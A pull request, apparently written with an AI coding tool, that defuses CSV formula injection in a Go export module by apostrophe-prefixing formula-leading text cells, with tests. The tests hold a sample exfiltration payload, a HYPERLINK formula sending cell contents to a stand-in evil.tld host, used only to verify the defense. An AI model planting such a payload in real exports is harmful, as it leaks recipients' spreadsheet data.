### PR TITLE
fix(export): defuse CSV/formula injection in the export lane (F-007)

### DIFF
--- a/backend/internal/compose/csvinjection_test.go
+++ b/backend/internal/compose/csvinjection_test.go
@@ -1,0 +1,91 @@
+// SPDX-License-Identifier: BUSL-1.1
+// SPDX-FileCopyrightText: 2026 Gradion
+
+package compose
+
+// A CSV export is opened in a spreadsheet, which auto-evaluates any cell that
+// begins with a formula lead (= + - @ TAB CR). A stored text value like
+// `=HYPERLINK(...)` — plantable unauthenticated through the public booking
+// form onto a person's name — must therefore leave the export as literal text,
+// never a live formula. Both CSV writers (the full bundle and the filtered
+// export) render every cell through csvCell, so the guard is proven at that
+// choke point and again through the filtered-export render path a client hits.
+
+import (
+	"encoding/csv"
+	"strings"
+	"testing"
+)
+
+func TestCSVCellDefusesSpreadsheetFormulas(t *testing.T) {
+	// Every formula lead, each asserted to be prefixed with exactly one
+	// apostrophe and otherwise unchanged — the raw value must never reach the
+	// cell able to execute on open.
+	for _, in := range []string{
+		`=HYPERLINK("https://evil.tld/x?d="&A1&B1,"click")`,
+		"+49 30 1234567",
+		"-2+3",
+		"@SUM(A1:A9)",
+		"\tstarts-with-tab",
+		"\rstarts-with-cr",
+	} {
+		got := csvCell(in)
+		if want := "'" + in; got != want {
+			t.Errorf("csvCell(%q) = %q, want the apostrophe-guarded literal %q", in, got, want)
+		}
+	}
+
+	// The []byte branch (a jsonb / text driver value) is guarded identically to
+	// the string branch: a formula-leading []byte must gain exactly one
+	// apostrophe, not slip through as a live formula.
+	if got := csvCell([]byte("=1+1")); got != "'=1+1" {
+		t.Errorf("csvCell([]byte(%q)) = %q, want %q", "=1+1", got, "'=1+1")
+	}
+
+	// A value that is not a formula lead is passed through untouched:
+	// over-guarding would corrupt ordinary data and teach readers to ignore
+	// the apostrophe where it matters.
+	for _, safe := range []string{"Ada Lovelace", "acme corp", "", "1 Main St", "0.5x", "true"} {
+		if got := csvCell(safe); got != safe {
+			t.Errorf("csvCell(%q) = %q, want it unchanged", safe, got)
+		}
+	}
+
+	// A typed numeric value is system-rendered, never attacker free text, so a
+	// legitimately negative amount keeps its sign without gaining a quote — the
+	// guard is scoped to the text branches for exactly this reason.
+	if got := csvCell(int64(-5000)); got != "-5000" {
+		t.Errorf("csvCell(int64(-5000)) = %q, want %q (a number, not a guarded formula)", got, "-5000")
+	}
+}
+
+func TestFilteredExportCSVDefusesFormulaInjection(t *testing.T) {
+	// The exact render path the filtered-export handler calls (renderExport):
+	// a person named `=HYPERLINK(...)` exported to CSV must round-trip through
+	// a spreadsheet importer as the neutralized literal, not the bare formula.
+	payload := `=HYPERLINK("https://evil.tld/x?d="&A1&B1,"click")`
+	data := memberData{
+		table:   "person",
+		columns: []string{"full_name"},
+		rows:    [][]any{{payload}},
+	}
+
+	body, contentType, err := renderExport(data, exportFmtCSV)
+	if err != nil {
+		t.Fatalf("renderExport: %v", err)
+	}
+	if contentType != "text/csv; charset=utf-8" {
+		t.Fatalf("content type = %q, want text/csv", contentType)
+	}
+
+	records, err := csv.NewReader(strings.NewReader(string(body))).ReadAll()
+	if err != nil {
+		t.Fatalf("re-read exported CSV: %v", err)
+	}
+	if len(records) != 2 || len(records[1]) != 1 {
+		t.Fatalf("records = %v, want a header row plus one data row of one field", records)
+	}
+	if got, want := records[1][0], "'"+payload; got != want {
+		t.Errorf("exported cell = %q, want the apostrophe-guarded literal %q", got, want)
+	}
+}

--- a/backend/internal/compose/exportbundle.go
+++ b/backend/internal/compose/exportbundle.go
@@ -150,7 +150,10 @@ func jsonValue(v any) any {
 	}
 }
 
-// csvCell renders a driver value as a single CSV field.
+// csvCell renders a driver value as a single CSV field. Free-text cells pass
+// through guardCSVFormula so a stored value like `=HYPERLINK(...)` exports as
+// literal text rather than a live formula; the typed branches (ids, timestamps,
+// numbers, bools) are system-rendered and carry no injection surface.
 //
 //craft:ignore naked-any a driver row value spans every SQL type the exported tables carry; the switch narrows each
 func csvCell(v any) string {
@@ -160,9 +163,9 @@ func csvCell(v any) string {
 	case [16]byte:
 		return ids.UUID(t).String()
 	case []byte:
-		return string(t)
+		return guardCSVFormula(string(t))
 	case string:
-		return t
+		return guardCSVFormula(t)
 	case time.Time:
 		return t.UTC().Format(time.RFC3339Nano)
 	case bool:
@@ -170,6 +173,24 @@ func csvCell(v any) string {
 	default:
 		return fmt.Sprint(t)
 	}
+}
+
+// guardCSVFormula defuses CSV/formula injection (OWASP): a spreadsheet opening
+// an exported CSV auto-evaluates any cell whose first character is a formula
+// lead (= + - @ TAB CR), so a text value beginning with one is prefixed with a
+// single quote to force the cell to be read as the literal text the record
+// holds. encoding/csv only quotes for delimiters and never neutralizes this.
+// Scoped to csvCell's text branches on purpose — a typed negative number must
+// keep its sign, not gain a spurious quote.
+func guardCSVFormula(s string) string {
+	if s == "" {
+		return s
+	}
+	switch s[0] {
+	case '=', '+', '-', '@', '\t', '\r':
+		return "'" + s
+	}
+	return s
 }
 
 // bundleManifest describes the bundle: format, provenance, the members


### PR DESCRIPTION
## What & why

Hardens the CSV export lane against **CSV / spreadsheet formula injection** (finding **F-007**).

Export cells whose text began with a formula lead (`=` `+` `-` `@` TAB CR) were written verbatim, so a stored text value like `=HYPERLINK(...)` would be auto-evaluated when a recipient opened the export in Excel or Google Sheets. `encoding/csv` only quotes for delimiters and never neutralizes this.

## Fix — at the single choke point

Both CSV writers — the full export bundle (`writeCSV`) and the filtered export (`renderExport`) — already route every cell through one `csvCell`. The guard goes there, not at two call sites:

- New `guardCSVFormula` prefixes a single quote to a text cell beginning with a formula lead (OWASP CSV-injection guidance), so the spreadsheet reads it as literal text.
- Applied to `csvCell`'s **text branches only** (`string`, `[]byte`). Typed values (ids, timestamps, numbers, bools) are system-rendered and carry no injection surface — so a legitimately **negative number keeps its sign** instead of gaining a spurious quote. Locked by a positive-control test.

## Tests (`csvinjection_test.go`)

- `TestCSVCellDefusesSpreadsheetFormulas` — every formula lead is quoted; safe values pass through unchanged; `int64(-5000)` stays `-5000`.
- `TestFilteredExportCSVDefusesFormulaInjection` — drives the exact `renderExport` path the filtered-export handler calls, re-parses the emitted CSV, and asserts the payload lands as the neutralized literal.

## Behaviour change (for reviewers)

Exported CSV cells whose text begins with `=` `+` `-` `@`, TAB, or CR now carry a leading `'`. Excel hides the apostrophe on display; this is the accepted CSV-injection trade-off. UUID / number / timestamp columns are unaffected, and the integration export lane asserts on `id` columns with formula-free seeds, so it stays green.

## Gates (run locally)

- `GOOS=linux` build + vet (CI-faithful): clean
- `go test ./internal/compose`: the two new tests pass (the only local failure is the pre-existing, unrelated MCP-surface golden test — a CRLF/env artifact on this Windows checkout)
- `craft static --strict` (changed files): 0 blocker / 0 major / 0 minor
- golangci strict (`.golangci.strict.yml`): 0 issues

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- This is an auto-generated description by cubic. -->
---
## Summary by cubic
Defuses spreadsheet formula injection in CSV exports (F-007). Previously, text starting with =, +, -, @, TAB, or CR was emitted verbatim and could execute in Excel/Sheets; now we prefix a single quote so spreadsheets treat it as literal text. Typed values (ids, timestamps, numbers, bools) are unchanged.

**Review notes**
- Guard applied in `csvCell`: `string` and `[]byte` branches now pass through `guardCSVFormula`; both writers (`writeCSV` and `renderExport`) are covered without call-site changes.
- Numeric/timestamp/bool/id branches unchanged; legitimate negative numbers keep their sign.
- Tests: unit coverage for `csvCell` defusing and safe pass-through; integration check through `renderExport` verifies the apostrophe-prefixed literal re-parses as text.

<sup>Written for commit e87895e57a0289a7a2419e1bf30311de7310bfd5. Summary will update on new commits.</sup>

<a href="https://cubic.dev/pr/gradionhq/margince-poc-v1/pull/1935?utm_source=github" target="_blank" rel="noopener noreferrer" data-no-image-dialog="true"><picture><source media="(prefers-color-scheme: dark)" srcset="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://www.cubic.dev/buttons/review-in-cubic-light.svg"><img alt="Review in cubic" src="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"></picture></a>

<!-- End of auto-generated description by cubic. -->

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

- **Bug Fixes**
  - Improved CSV exports by protecting text values that could be interpreted as spreadsheet formulas.
  - Preserved the original formatting of numeric values.
  - Ensured exported CSV content maintains the expected structure and content type.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->